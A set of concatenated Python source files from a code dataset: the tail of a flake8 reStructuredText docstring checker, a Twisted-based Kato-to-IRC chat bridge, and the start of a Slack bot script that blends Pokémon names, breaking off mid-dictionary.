is_future_import = self._parse_from_import_source()
self._parse_from_import_names(is_future_import)
def _parse_from_import_source(self):
"""Parse the 'from x import' part in a 'from x import y' statement.
Return true iff `x` is __future__.
"""
assert self.current.value == "from", self.current.value
self.stream.move()
is_future_import = self.current.value == "__future__"
self.stream.move()
while (
self.current is not None
and self.current.kind in (tk.DOT, tk.NAME, tk.OP)
and self.current.value != "import"
):
self.stream.move()
if self.current is None or self.current.value != "import":
return False
self.check_current(value="import")
assert self.current.value == "import", self.current.value
self.stream.move()
return is_future_import
def _parse_from_import_names(self, is_future_import):
"""Parse the 'y' part in a 'from x import y' statement."""
if self.current.value == "(":
self.consume(tk.OP)
expected_end_kinds = (tk.OP,)
else:
expected_end_kinds = (tk.NEWLINE, tk.ENDMARKER)
while self.current.kind not in expected_end_kinds and not (
self.current.kind == tk.OP and self.current.value == ";"
):
if self.current.kind != tk.NAME:
self.stream.move()
continue
self.log.debug(
"parsing import, token is %r (%s)",
self.current.kind,
self.current.value,
)
if is_future_import:
self.log.debug("found future import: %s", self.current.value)
self.future_imports.add(self.current.value)
self.consume(tk.NAME)
self.log.debug(
"parsing import, token is %r (%s)",
self.current.kind,
self.current.value,
)
if self.current.kind == tk.NAME and self.current.value == "as":
self.consume(tk.NAME) # as
if self.current.kind == tk.NAME:
self.consume(tk.NAME) # new name, irrelevant
if self.current.value == ",":
self.consume(tk.OP)
self.log.debug(
"parsing import, token is %r (%s)",
self.current.kind,
self.current.value,
)
################################################
# End of code copied from pydocstyle/parser.py #
################################################
parse = Parser()
class reStructuredTextChecker(object):
"""Checker of Python docstrings as reStructuredText."""
name = "rst-docstrings"
version = __version__
STDIN_NAMES = {"stdin", "-", "(none)", None}
def __init__(self, tree, filename="(none)"):
"""Initialise."""
self.tree = tree
self.filename = filename
try:
self.load_source()
self.err = None
except Exception as err:
self.source = None
self.err = err
@classmethod
def add_options(cls, parser):
"""Add RST directives and roles options."""
parser.add_option(
"--rst-directives",
metavar="LIST",
default="",
parse_from_config=True,
comma_separated_list=True,
help="Comma-separated list of additional RST directives.",
)
parser.add_option(
"--rst-roles",
metavar="LIST",
default="",
parse_from_config=True,
comma_separated_list=True,
help="Comma-separated list of additional RST roles.",
)
@classmethod
def parse_options(cls, options):
"""Adding black-config option."""
cls.extra_directives = options.rst_directives
cls.extra_roles = options.rst_roles
def run(self):
"""Use docutils to check docstrings are valid RST."""
# Is there any reason not to call load_source here?
if self.err is not None:
assert self.source is None
msg = "%s%03i %s" % (
rst_prefix,
rst_fail_load,
"Failed to load file: %s" % self.err,
)
yield 0, 0, msg, type(self)
module = []
try:
module = parse(StringIO(self.source), self.filename)
except SyntaxError as err:
msg = "%s%03i %s" % (
rst_prefix,
rst_fail_parse,
"Failed to parse file: %s" % err,
)
yield 0, 0, msg, type(self)
module = []
except AllError:
msg = "%s%03i %s" % (
rst_prefix,
rst_fail_all,
"Failed to parse __all__ entry.",
)
yield 0, 0, msg, type(self)
module = []
for definition in module:
if not definition.docstring:
# People can use flake8-docstrings to report missing
# docstrings
continue
try:
# Note we use the PEP257 trim algorithm to remove the
# leading whitespace from each line - this avoids false
# positive severe error "Unexpected section title."
unindented = trim(dequote_docstring(definition.docstring))
# Off load RST validation to reStructuredText-lint
# which calls docutils internally.
# TODO: Should we pass the Python filename as filepath?
rst_errors = list(rst_lint.lint(unindented))
except Exception as err:
# e.g. UnicodeDecodeError
msg = "%s%03i %s" % (
rst_prefix,
rst_fail_lint,
"Failed to lint docstring: %s - %s" % (definition.name, err),
)
yield definition.start, 0, msg, type(self)
continue
for rst_error in rst_errors:
# TODO - make this a configuration option?
if rst_error.level <= 1:
continue
# Levels:
#
# 0 - debug --> we don't receive these
# 1 - info --> RST1## codes
# 2 - warning --> RST2## codes
# 3 - error --> RST3## codes
# 4 - severe --> RST4## codes
#
# Map the string to a unique code:
msg = rst_error.message.split("\n", 1)[0]
code = code_mapping(
rst_error.level, msg, self.extra_directives, self.extra_roles
)
if not code:
# We ignored it, e.g. a known Sphinx role
continue
assert 0 < code < 100, code
code += 100 * rst_error.level
msg = "%s%03i %s" % (rst_prefix, code, msg)
# This will return the line number by combining the
# start of the docstring with the offet within it.
# We don't know the column number, leaving as zero.
yield definition.start + rst_error.line, 0, msg, type(self)
def load_source(self):
"""Load the source for the specified file."""
if self.filename in self.STDIN_NAMES:
self.filename = "stdin"
if sys.version_info[0] < 3:
self.source = sys.stdin.read()
else:
self.source = TextIOWrapper(sys.stdin.buffer, errors="ignore").read()
else:
# Could be a Python 2.7 StringIO with no context manager, sigh.
# with tokenize_open(self.filename) as fd:
# self.source = fd.read()
handle = tokenize_open(self.filename)
self.source = handle.read()
handle.close()
| 2.6875
| 3
|
chat.py
|
kato-im/katirc
| 1
|
12777739
|
import re
import os
from twisted.internet import defer
from twisted.python.failure import Failure
from kato import KatoHttpClient
from util import *
# characters that are disallowed from the channel name
CHANNEL_NAME_DISALLOWED = re.compile(r"[^a-zA-Z0-9_-]+", re.UNICODE)
# characters that are disallowed from the nick name
NICKNAME_DISALLOWED = re.compile(r"[^a-zA-Z0-9_-]+", re.UNICODE)
# space handling regex
SPACES = re.compile(r"[\s_]+", re.UNICODE)
# IRC channel <--> Kato room object
class Channel(object):
# IRC channel name, with the channel leading character
irc_channel = ""
# KatoRoom object with which this channel is associated
kato_room = None
# whether the IRC user is in the channel
joined = None
def __init__(self, kato_room):
if not kato_room:
raise ValueError("Must provide Kato room")
self.irc_channel = Channel.create_channel_name(kato_room)
self.joined = False
self.kato_room = kato_room
def __repr__(self):
return "Channel{irc_channel='%s', kato_room='%s', joined=%s}" % \
(self.irc_channel, self.kato_room, self.joined)
# create a channel name from a kato room
@classmethod
def create_channel_name(cls, kato_room):
if kato_room.type == "support_front":
return "#kato_support"
return cls.normalize_channel_name(kato_room.name)
# according to the IRC spec, channels must begin with a '&', '#', '+' or
# '!'. Other than that, they must be at most 50 characters, and must not
# contain a space, control G (ASCII 7), or a comma. The names themselves
# are case insensitive.
#
# for reasons of practically, this function:
# - normalizes the channel name to lowercase, prefixed with a #
# - converts all spaces to underscores
# - removes all non-alphanumeric characters
# - truncates to length 50, if needed
#
# in addition, several rooms are given special names, such as the Kato
# support room
# TODO: check for uniqueness, and augment somehow
@classmethod
def normalize_channel_name(cls, name):
name = name.lower()
name = strip_accents(name)
name = SPACES.sub('_', name)
name = CHANNEL_NAME_DISALLOWED.sub('', name)
# second pass, to remove double underscores if the original string
# were "a & b" -> "a__b" -> "a_b"
name = SPACES.sub('_', name)
name = name.strip("_")
name = name[:50]
return "#" + name
# IRC nick <--> Kato account object
class Account(object):
# IRC nickname with which this account is associated
nickname = ""
# KatoAccount object with which this account is associated
# this is None for the pseudo system user
kato_account = None
def __init__(self, kato_account, nickname=None):
self.kato_account = kato_account
if nickname:
self.nickname = nickname
else:
self.nickname = Account.create_nickname(kato_account)
def __repr__(self):
return "Account{nickname='%s', kato_account='%s'}" % \
(self.nickname, self.kato_account)
# create a nickname from a kato account name
@classmethod
def create_nickname(cls, kato_account):
name = kato_account.name
return cls.normalize_nickname(name)
# according to the IRC spec, nick names follow the rule must be of length
# 9 or shorter, begin with a letter or special character, and consist only
# of letters, digits, ecpail characters, and a -
# special chracters are defined as %x5B-60 / %x7B-7D
# that is, "[", "]", "\", "`", "_", "^", "{", "|", "}"
#
# for reasons of practically, this function:
# - normalizes the user's name to lowercase
# - converts all spaces to underscores
# - removes all non-alphanumeric characters
# - truncates to length *50*, if needed; note that this violates the spec,
# but such short nicknames are silly, and irssi handles more
# TODO: strict mode to override this
#
# TODO: check for uniqueness, and augment somehow
@classmethod
def normalize_nickname(cls, name):
name = name.lower()
name = strip_accents(name)
name = SPACES.sub('_', name)
name = NICKNAME_DISALLOWED.sub('', name)
# second pass, to remove double underscores if the original string
# were "a & b" -> "a__b" -> "a_b"
name = SPACES.sub('_', name)
name = name.strip("_")
name = name[:50]
return name
# TODO: better identifier
# IRC identifier used for a fully-qualified identifier
def irc_ident(self):
return self.nickname + "!" + self.nickname + "@kato"
# object that manages chat operations and state
#
# all verbs here are from the perspective of the IRC client; for example,
# send_message sends a message (received from IRC) to Kato, and
# receive_message sends a message received from Kato to the local client's IRC
# message
#
# TODO: use a semaphore to prevent multiple operations at once, so messages stay ordered
class Chat(object):
irc = None
# not initialized until the IRC connection initializes the client with a
# user-provided username/password
kato = None
# list of Channel objects
channels = None
# Account objects, indexed by the Account's ID
accounts = None
# Account object of the current user
account = None
# keep alive times
# units are seconds to an arbitrary point in the past, using os.times()[4]
# (real time)
last_keep_alive_sent = None
last_keep_alive_received = None
def __init__(self, irc):
self.irc = irc
self.accounts = dict()
self.channels = []
# returns True/False depending on whether this chat connection is
# connected to kato
# see also keep_alive, for keep the connection open
def is_connected(self):
return self.kato != None
# initializes a Kato connection
# token should be an email / password combination, separated by a space
# on error, a message will be provided to the user from the system user,
# rather than returning an error via this function, and the connection
# will be dropped
def init_kato(self, token):
self.kato = None
kato = KatoHttpClient(KatoMessageReceiver(self))
d_init = defer.Deferred()
parts = token.split(" ", 1)
if len(parts) != 2:
self.receive_system_message("Whoops, your IRC password was not " +
"valid. Please send your Kato username (your email " +
"address) and your Kato password, separated by a space, " +
"as your IRC password.")
self.disconnect()
d_init.errback(ValueError("Invalid token"))
return d_init
email, password = parts
d_login = kato.login(email, password)
# called once all data has been loaded correctly, including members,
# rooms, orgs, etc
def init_success():
d_init.callback(self)
def error(failure=None):
if failure and failure.check(ValueError):
self.receive_system_message("Darn, we could not connect to " +
"Kato. Please check your username and password.")
else:
self.receive_system_message("Woah, something went wrong " +
"when connecting to Kato. Whoops. Sorry about that.")
print "Unable to connect to Kato.", failure
self.kato = None
self.disconnect()
d_init.errback(failure)
# organization members result
# account_list is a list of KatoAccount objects
# see get_organization_members in KatoHttpClient
def org_members_success(account_list):
for account in account_list:
self._add_kato_account(account)
# rooms for a single organization result
# room_list is a list of KatoRoom objects
# see get_rooms in KatoHttpClient
def rooms_success(room_list):
for room in room_list:
self._add_kato_room(room)
# information about a single account
# kato_account is the account of this user
# see get_account_info in KatoHttpClient
def account_info_success(kato_account):
# register account
# cannot set the nickname here because the user may not have given
# the nickname to the server yet
account = self._add_kato_account(kato_account, self.irc.nickname)
# this account is for the current user, so register it specially
self.account = account
# process memberships
deferds = []
for kato_membership in kato_account.memberships:
d_org_members = self.kato.get_organization_members(kato_membership.org_id)
d_org_members.addCallbacks(org_members_success)
deferds.append(d_org_members)
d_org_rooms = self.kato.get_rooms(kato_membership.org_id)
d_org_rooms.addCallbacks(rooms_success)
deferds.append(d_org_rooms)
# after all members and rooms have loaded, trigger
d_loaded = defer.gatherResults(deferds, consumeErrors=True)
def success(param=None):
init_success()
d_loaded.addCallbacks(success, error)
# login succeeded
# pre-fetch account information
def login_success(ignored):
# defined above; allow access chat-wide
self.kato = kato
d_account = self.kato.get_account_info()
d_account.addCallbacks(account_info_success, error)
d_login.addCallbacks(login_success, error)
return d_init
# disconnects
# can be called either from a user-initiated disconnect or a lost Kato
# connection
def disconnect(self):
def loggedout(ignored=None):
print "Closing transport"
self.irc.transport.loseConnection()
def handle_error(failure):
# failed to logout; kill the IRC connection anyways
print "Failed to close Kato connection."
self.irc.transport.loseConnection()
# logout of kato
if self.kato:
d = self.kato.logout()
d.addCallbacks(loggedout, handle_error)
else:
loggedout()
# keep alive
# returns True if is_connected and the connection has successfully
# received a keep alive within keep_alive_timeout
# this requires that keep_alive is called on an interval shorter than
# keep_alive_timeout, leaving time for network overhead of making the keep
# alive call itself
def keep_alive(self, keep_alive_timeout):
if not self.is_connected():
return False
first_keep_alive = self.last_keep_alive_sent is None
self.kato.keep_alive()
self.last_keep_alive_sent = os.times()[4]
if first_keep_alive:
# assume that the connection is good, since we haven't had time to
# receive a keep alive response yet
return True
else:
# we should have received a keep alive - check that the keep alive
# has come back in time
secs_since_last_received = abs(self.last_keep_alive_received - \
self.last_keep_alive_sent)
# allow us to go three keep alive checks before we say we are not
# connected
return secs_since_last_received < keep_alive_timeout
# sends the given message to the given Channel
def send_message(self, channel, message):
message, mentions = self._process_irc_mentions(message)
self.kato.send_message(channel.kato_room, message, mentions)
# replaces IRC mentions with Kato mention text
# returns the modified message + a set of account IDs for everyone
# mentioned
# an IRC mention is defined as follows:
# - mention is the first word, or is proceeded by whitespace
# - mention is the last word, or is followed by a character that is
# disallowed in the nickname
# - the nickname itself may optionally be prepended by an @ character
def _process_irc_mentions(self, message):
mentions = set()
# TODO: limit accounts by those in the organization of the room
for id, account in self.accounts.iteritems():
position = 0
while True:
position = message.find(account.nickname, position)
next_char = position + len(account.nickname)
if position == -1:
position = 0
break
# before character
if position == 0:
separated_before = True
else:
# search for leading @, which we want to replace too, so
# we don't get @@, since we prepend an @ below
if message[position - 1] == "@":
position -= 1
# require a space before the nick
m = SPACES.match(message[position - 1])
separated_before = bool(m)
# after character
if next_char == len(message):
separated_after = True
else:
m = NICKNAME_DISALLOWED.match(message[next_char])
separated_after = bool(m)
if separated_before and separated_after:
message = "".join([message[:position], "@", id, message[next_char:]])
mentions.add(id)
# continue searching after the replaced ID + "@"
position = position + 1 + len(id)
else:
# nickname matched, but is part of a bigger word; skip
position = next_char
return message, mentions
# receives a message in the given Channel from the given Account and sends it to the client
def receive_message(self, channel, account, message):
# skip messages sent by the current user
if account.kato_account.id == self.kato.account_id:
return
# skip messages from channels that have not been joined
if not channel.joined:
return
# convert Kato mentions to nicknames
message = self._process_kato_mentions(message)
self.irc.privmsg(account.irc_ident(), channel.irc_channel, message)
# TODO: send read event?
# replaces kato mentions with the IRC nickname of the account
# returns a modified message
def _process_kato_mentions(self, message):
# TODO: limit accounts by those in the organization of the room
# TODO: add detection of names, since Kato sometime doesn't do the
# mentions correctly (see @.:. Skylar .:.)
for id, account in self.accounts.iteritems():
message = message.replace("@" + id, account.nickname)
return message
# sends a private message to the given Account
def send_private_message(self, account, message):
message, mentions = self._process_irc_mentions(message)
self.kato.send_private_message(account.kato_account, message, mentions)
# receives a private message from the given Account
def receive_private_message(self, account, message):
# skip messages sent by the current user
if account.kato_account.id == self.kato.account_id:
return
# convert Kato mentions to nicknames
message = self._process_kato_mentions(message)
self.irc.privmsg(account.irc_ident(), account.nickname, message)
# TODO: send read event?
# provides the client with a system message
# this can be used to report error conditions
def receive_system_message(self, message):
self.irc.privmsg(self.irc.SYSTEM_USER,
self.irc.nickname,
message)
# TODO: better error handling
# returns a Channel object for the given IRC channel name, with prefix,
# via a deferred
# if the channel is not valid, then an errback will be sent
def find_channel_from_ircname(self, irc_channel):
def synchronous():
for channel in self.channels:
if channel.irc_channel == irc_channel:
return channel
else:
# channel does not exist yet
raise ValueError("Channel " + irc_channel + " not found")
return defer.maybeDeferred(synchronous)
# returns a Channel object for the given Kato room ID, via a deferred
# if the channel is not valid, then an errback will be sent
def find_channel_from_katoid(self, room_id):
def synchronous():
for channel in self.channels:
if channel.kato_room and channel.kato_room.id == room_id:
return channel
else:
raise ValueError("Room ID is not valid")
return defer.maybeDeferred(synchronous)
# returns an Account for the given IRC nickname, via a deferred
# if the account is not valid, then an errback will be sent
def find_account_from_ircnick(self, nickname):
def synchronous():
for id, account in self.accounts.iteritems():
if account.nickname == nickname:
return account
else:
raise ValueError("Could not find account with IRC nick: " +
nickname)
return defer.maybeDeferred(synchronous)
# returns an Account for the given Kato account ID, via a deferred
# if the account is not valid, then an errback will be sent
def find_account_from_katoid(self, account_id):
def synchronous():
try:
return self.accounts[account_id]
except KeyError:
raise ValueError("Could not find account ID: " + account_id)
return defer.maybeDeferred(synchronous)
# adds/updates a kato account
# updates only affect the kato_account object of the account
def _add_kato_account(self, kato_account, nickname=None):
if kato_account.id in self.accounts:
# update existing account
existing = self.accounts[kato_account.id]
existing.kato_account = kato_account
else:
# new account
self.accounts[kato_account.id] = Account(kato_account, nickname)
# say hello, so that we can recieve and send messages
self.kato.hello_account(kato_account)
return self.accounts[kato_account.id]
# adds/updates a kato room
def _add_kato_room(self, kato_room):
for channel in self.channels:
if channel.kato_room.id == kato_room.id:
# channel already added; update info
channel.kato_room = kato_room
break
else:
# channel does not exist yet; create it
channel = Channel(kato_room)
self.channels.append(channel)
# indicates that the user has joined the given IRC channel
#
# returns a defer that fires with the Channel on success, or with an
# errback if the Kato Room could not be joined, either because it does not
# exist (ValueError) or for network reasons (other)
def join_channel(self, irc_channel):
d = defer.Deferred()
for channel in self.channels:
if channel.irc_channel == irc_channel:
# channel already exists
if channel.joined:
# already in the channel; do nothing
d.callback(channel)
break
else:
# not in the channel yet; enter the channel
self.kato.enter_room(channel.kato_room)
channel.joined = True
d.callback(channel)
break
else:
# channel does not exist yet
d.errback(ValueError(irc_channel +
" does not correspond to a known Kato room."))
return d
# leave an IRC channel
def leave_channel(self, irc_channel):
print "Leaving", irc_channel
for channel in self.channels:
if channel.irc_channel == irc_channel:
print "Leaving channel", channel
channel.joined = False
self.kato.leave_room(channel.kato_room)
# left the room or room was not found; send the part message
# object that receives and acts upon messages from the Kato client
# kato_<MESSAGE_TYPE> will be called with the message
class KatoMessageReceiver(object):
# Chat
chat = None
def __init__(self, chat):
self.chat = chat
# TODO
#def kato_ANNOUNCE(self, message):
# pass
# check message; used to check the status of the client for a given group
# usual check sequence:
#
# server sends check message
# {
# "ts":1379271141415,
# "type":"check",
# "group_id":"<GROUP_ID>"
# }
#
# client responds
# note that the tz_offset is positive for some reason
# {
# "group_id":"<GROUP_ID>",
# "type":"presence",
# "params":{
# "status":"(online|away)",
# "tz_offset":<TZ_OFFSET>,
# "capabilities":[]
# }
# }
#
# server responds with a presence message for the current account
# see kato_PRESENCE
# TODO
#def kato_CHECK(self, message):
# pass
# keep alive message used to check connection status
# the web client sends a keep alive message every 30 seconds (formally
# every 5 seconds), and the server responses
#
# client sends
# {"type":"keep_alive"}
#
# server responds
# {"ts":1379270870453,"type":"keep_alive"}
def kato_KEEP_ALIVE(self, message):
self.chat.last_keep_alive_received = os.times()[4]
# TODO
#def kato_OFF_RECORD(self, message):
# pass
# TODO
#def kato_OMITTED(self, message):
# pass
# TODO
#def kato_ON_RECORD(self, message):
# pass
# used to indicate presence of an account, including the current user
# see kato_CHECK
#
# server sends
# {
# "ts":1379271141455,
# "type":"presence",
# "from":{
# "id":"<ACCOUNT_ID>",
# "status":"(verified_email|unverified_email)",
# "email":"<EMAIL_ADDRESS>",
# "name":"<ACCOUNT_NAME>"
# },
# "group_id":"<GROUP_ID>",
# "params":{
# "status":"(online|away)",
# "tz_offset":<TZ_OFFSET>,
# "capabilities":[]
# }
# }
# TODO
#def kato_PRESENCE(self, message):
# pass
# indicates that a given message has been read
#
# server sends
# {
# "ts":1379272428497,
# "type":"read",
# "from":{
# "id":"<ACCOUNT_ID>",
# "status":"(verified_email|unverified_email)",
# "email":"<EMAIL_ADDRESS>",
# "name":"<NAME>"
# },
# "room_id":"<ROOM_ID>",
# "params":{
# "last_ts":1379272416000,
# "seq":17,
# "diff":0,
# "mentioned":false
# }
# }
def kato_READ(self, message):
pass
# TODO
#def kato_RTC_SIGNAL(self, message):
# pass
# TODO
#def kato_RTC_START(self, message):
# pass
# TODO
#def kato_RTC_STOP(self, message):
# pass
# TODO
#def kato_SILENCE(self, message):
# pass
# a text message
# {
# "ts":1379214315159,
# "type":"text",
# "from":{
# "id":"<ACCOUNT_ID>",
# "status":"(verified_email|unverified_email)",
# "email":"<EMAIL_ADDRESS>",
# "name":"<NAME>"
# },
# # for a chat room, room_id is a hex string
# # for a private message, the lower account ID comes first, followed by the higher accountID
# "room_id":"<ROOM_ID>|<<ACCOUNT_ID>-<ACCOUNT_ID>",
# "params":{
# "data":{
# "id":"25d837dc23fb2e1c",
# # key not provided if no mentions
# "mention_names":{
# "<ACCOUNT_ID>":"<ACCOUNT_NAME>"
# }
# },
# # if a mention, @<NAME> replaced with @<ACCOUNT_ID> in the body
# "text":"<MESSAGE_CONTENTS>",
# "mentions":["<ACCOUNT_ID>"],
# "mentions":[],
# "mentioned_everybody":false
# },
# "seq":1
# }
def kato_TEXT(self, message):
#
# channel message
#
def channel_found(channel):
account_id = message["from"]["id"]
d = self.chat.find_account_from_katoid(account_id)
def sender_found(account):
text = message["params"]["text"]
self.chat.receive_message(channel, account, text)
def sender_not_found(ignored):
# cannot find the sender; fake it
# this happens when an integration of some kind (e.g. Github)
# sends a message; however, Kato doesn't give us permission to
# fetch Github's info from their servers, so we have to just
# pass the message along
kato_account = KatoAccount(account_id,
message["from"]["name"],
"", # no email
message["from"]["status"],
[])
account = Account(kato_account)
self.chat.receive_message(channel, account, message["params"]["text"])
d.addCallbacks(sender_found, sender_not_found)
def channel_not_found(error):
# TODO: try to find the channel (if it's new), alert the user, etc
print "Channel not found", error
#
# private message
#
def priv_account_found(account):
text = message["params"]["text"]
self.chat.receive_private_message(account, text)
def priv_account_not_found(error):
# TODO: might be a new user; alert the user on failure
print "Account not found", error
room_id = message["room_id"]
if "-" in room_id:
# private message
account_id = message["from"]["id"]
d = self.chat.find_account_from_katoid(account_id)
d.addCallbacks(priv_account_found, priv_account_not_found)
else:
# channel message
d = self.chat.find_channel_from_katoid(room_id)
d.addCallbacks(channel_found, channel_not_found)
# used to indicate that a user is typing in a given room
# {
# # room_id can be in either chat room or private message format
# "room_id": "<ROOM_ID>",
# "from": {
# "name": "<NAME>",
# "email": "<EMAIL_ADDRESS>",
# "status": "(verified_email|unverified_email)",
# "id": "<ACCOUNT_ID>"
# },
# "type": "typing",
# "ts": 1379214313294
# }
# TODO
#def kato_TYPING(self, message):
# pass
# used to indicate that a user is no longer typing in a given room
# this message is only sent if a user does not send a message
# {
# # room_id can be in either chat room or private message format
# "room_id": "<ROOM_ID>",
# "from": {
# "name": "<NAME>",
# "email": "<EMAIL_ADDRESS>",
# "status": "(verified_email|unverified_email)",
# "id": "<ACCOUNT_ID>"
# },
# "type": "reset_typing",
# "ts": 1379306032396
# }
#def kato_RESET_TYPING(self, message):
# pass
# unknown type of message
def kato_unknown(self, message):
print "Received unknown message:"
import pprint
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(message)
| 2.109375
| 2
|
uqcsbot/scripts/pokemash.py
|
dhood/uqcsbot
| 38
|
12777740
|
<reponame>dhood/uqcsbot<filename>uqcsbot/scripts/pokemash.py
from uqcsbot import bot, Command
from re import match
from typing import Optional
POKEDEX = {"bulbasaur": 1,
"ivysaur": 2,
"venusaur": 3,
"charmander": 4,
"charmeleon": 5,
"charizard": 6,
"squirtle": 7,
"wartortle": 8,
"blastoise": 9,
"caterpie": 10,
"metapod": 11,
"butterfree": 12,
"weedle": 13,
"kakuna": 14,
"beedrill": 15,
"pidgey": 16,
"pidgeotto": 17,
"pidgeot": 18,
"rattata": 19,
"raticate": 20,
"spearow": 21,
"fearow": 22,
"ekans": 23,
"arbok": 24,
"pikachu": 25,
"raichu": 26,
"sandshrew": 27,
"sandslash": 28,
"nidoran(f)": 29,
"nidorina": 30,
"nidoqueen": 31,
"nidoran(m)": 32,
"nidorino": 33,
"nidoking": 34,
"clefairy": 35,
"clefable": 36,
"vulpix": 37,
"ninetales": 38,
"jigglypuff": 39,
"wigglytuff": 40,
"zubat": 41,
"golbat": 42,
"oddish": 43,
"gloom": 44,
"vileplume": 45,
"paras": 46,
"parasect": 47,
"venonat": 48,
"venomoth": 49,
"diglett": 50,
"dugtrio": 51,
"meowth": 52,
"persian": 53,
"psyduck": 54,
"golduck": 55,
"mankey": 56,
"primeape": 57,
"growlithe": 58,
"arcanine": 59,
"poliwag": 60,
"poliwhirl": 61,
"poliwrath": 62,
"abra": 63,
"kadabra": 64,
"alakazam": 65,
"machop": 66,
"machoke": 67,
"machamp": 68,
"bellsprout": 69,
"weepinbell": 70,
"victreebel": 71,
"tentacool": 72,
"tentacruel": 73,
"geodude": 74,
"graveler": 75,
"golem": 76,
"ponyta": 77,
"rapidash": 78,
"slowpoke": 79,
"slowbro": 80,
"magnemite": 81,
"magneton": 82,
"farfetchd": 83,
"doduo": 84,
"dodrio": 85,
"seel": 86,
"dewgong": 87,
"grimer": 88,
"muk": 89,
"shellder": 90,
"cloyster": 91,
"gastly": 92,
"haunter": 93,
"gengar": 94,
"onix": 95,
"drowzee": 96,
"hypno": 97,
"krabby": 98,
"kingler": 99,
"voltorb": 100,
"electrode": 101,
"exeggcute": 102,
"exeggutor": 103,
"cubone": 104,
"marowak": 105,
"hitmonlee": 106,
"hitmonchan": 107,
"lickitung": 108,
"koffing": 109,
"weezing": 110,
"rhyhorn": 111,
"rhydon": 112,
"chansey": 113,
"tangela": 114,
"kangaskhan": 115,
"horsea": 116,
"seadra": 117,
"goldeen": 118,
"seaking": 119,
"staryu": 120,
"starmie": 121,
"<NAME>": 122,
"scyther": 123,
"jynx": 124,
"electabuzz": 125,
"magmar": 126,
"pinsir": 127,
"tauros": 128,
"magikarp": 129,
"gyarados": 130,
"lapras": 131,
"ditto": 132,
"eevee": 133,
"vaporeon": 134,
"jolteon": 135,
"flareon": 136,
"porygon": 137,
"omanyte": 138,
"omastar": 139,
"kabuto": 140,
"kabutops": 141,
"aerodactyl": 142,
"snorlax": 143,
"articuno": 144,
"zapdos": 145,
"moltres": 146,
"dratini": 147,
"dragonair": 148,
"dragonite": 149,
"mewtwo": 150,
"mew": 151}
PREFIX = {1: "Bulb",
2: "Ivy",
3: "Venu",
4: "Char",
5: "Char",
6: "Char",
7: "Squirt",
8: "War",
9: "Blast",
10: "Cater",
11: "Meta",
12: "Butter",
13: "Wee",
14: "Kak",
15: "Bee",
16: "Pid",
17: "Pidg",
18: "Pidg",
19: "Rat",
20: "Rat",
21: "Spear",
22: "Fear",
23: "Ek",
24: "Arb",
25: "Pika",
26: "Rai",
27: "Sand",
28: "Sand",
29: "Nido",
30: "Nido",
31: "Nido",
32: "Nido",
33: "Nido",
34: "Nido",
35: "Clef",
36: "Clef",
37: "Vul",
38: "Nine",
39: "Jiggly",
40: "Wiggly",
41: "Zu",
42: "Gol",
43: "Odd",
44: "Gloo",
45: "Vile",
46: "Pa",
47: "Para",
48: "Veno",
49: "Veno",
50: "Dig",
51: "Dug",
52: "Meow",
53: "Per",
54: "Psy",
55: "Gol",
56: "Man",
57: "Prime",
58: "Grow",
59: "Arca",
60: "Poli",
61: "Poli",
62: "Poli",
63: "Ab",
64: "Kada",
65: "Ala",
66: "Ma",
67: "Ma",
68: "Ma",
69: "Bell",
70: "Weepin",
71: "Victree",
72: "Tenta",
73: "Tenta",
74: "Geo",
75: "Grav",
76: "Gol",
77: "Pony",
78: "Rapi",
79: "Slow",
80: "Slow",
81: "Magne",
82: "Magne",
83: "Far",
84: "Do",
85: "Do",
86: "See",
87: "Dew",
88: "Gri",
89: "Mu",
90: "Shell",
91: "Cloy",
92: "Gas",
93: "Haunt",
94: "Gen",
95: "On",
96: "Drow",
97: "Hyp",
98: "Krab",
99: "King",
100: "Volt",
101: "Electr",
102: "Exegg",
103: "Exegg",
104: "Cu",
105: "Maro",
106: "Hitmon",
107: "Hitmon",
108: "Licki",
109: "Koff",
110: "Wee",
111: "Rhy",
112: "Rhy",
113: "Chan",
114: "Tang",
115: "Kangas",
116: "Hors",
117: "Sea",
118: "Gold",
119: "Sea",
120: "Star",
121: "Star",
122: "Mr.",
123: "Scy",
124: "Jyn",
125: "Electa",
126: "Mag",
127: "Pin",
128: "Tau",
129: "Magi",
130: "Gyara",
131: "Lap",
132: "Dit",
133: "Ee",
134: "Vapor",
135: "Jolt",
136: "Flare",
137: "Pory",
138: "Oma",
139: "Oma",
140: "Kabu",
141: "Kabu",
142: "Aero",
143: "Snor",
144: "Artic",
145: "Zap",
146: "Molt",
147: "Dra",
148: "Dragon",
149: "Dragon",
150: "Mew",
151: "Mew"}
SUFFIX = {1: "basaur",
2: "ysaur",
3: "usaur",
4: "mander",
5: "meleon",
6: "izard",
7: "tle",
8: "tortle",
9: "toise",
10: "pie",
11: "pod",
12: "free",
13: "dle",
14: "una",
15: "drill",
16: "gey",
17: "eotto",
18: "eot",
19: "tata",
20: "icate",
21: "row",
22: "row",
23: "kans",
24: "bok",
25: "chu",
26: "chu",
27: "shrew",
28: "slash",
29: "oran",
30: "rina",
31: "queen",
32: "ran",
33: "rino",
34: "king",
35: "fairy",
36: "fable",
37: "pix",
38: "tales",
39: "puff",
40: "tuff",
41: "bat",
42: "bat",
43: "ish",
44: "oom",
45: "plume",
46: "ras",
47: "sect",
48: "nat",
49: "moth",
50: "lett",
51: "trio",
52: "th",
53: "sian",
54: "duck",
55: "duck",
56: "key",
57: "ape",
58: "lithe",
59: "nine",
60: "wag",
61: "whirl",
62: "wrath",
63: "ra",
64: "bra",
65: "kazam",
66: "chop",
67: "choke",
68: "champ",
69: "sprout",
70: "bell",
71: "bell",
72: "cool",
73: "cruel",
74: "dude",
75: "eler",
76: "em",
77: "ta",
78: "dash",
79: "poke",
80: "bro",
81: "mite",
82: "ton",
83: "fetchd",
84: "duo",
85: "drio",
86: "eel",
87: "gong",
88: "mer",
89: "uk",
90: "der",
91: "ster",
92: "tly",
93: "ter",
94: "gar",
95: "ix",
96: "zee",
97: "no",
98: "by",
99: "ler",
100: "orb",
101: "ode",
102: "cute",
103: "utor",
104: "bone",
105: "wak",
106: "lee",
107: "chan",
108: "tung",
109: "fing",
110: "zing",
111: "horn",
112: "don",
113: "sey",
114: "gela",
115: "khan",
116: "sea",
117: "dra",
118: "deen",
119: "king",
120: "yu",
121: "mie",
122: "mime",
123: "ther",
124: "nx",
125: "buzz",
126: "mar",
127: "sir",
128: "ros",
129: "karp",
130: "dos",
131: "ras",
132: "to",
133: "vee",
134: "eon",
135: "eon",
136: "eon",
137: "gon",
138: "nyte",
139: "star",
140: "to",
141: "tops",
142: "dactyl",
143: "lax",
144: "cuno",
145: "dos",
146: "tres",
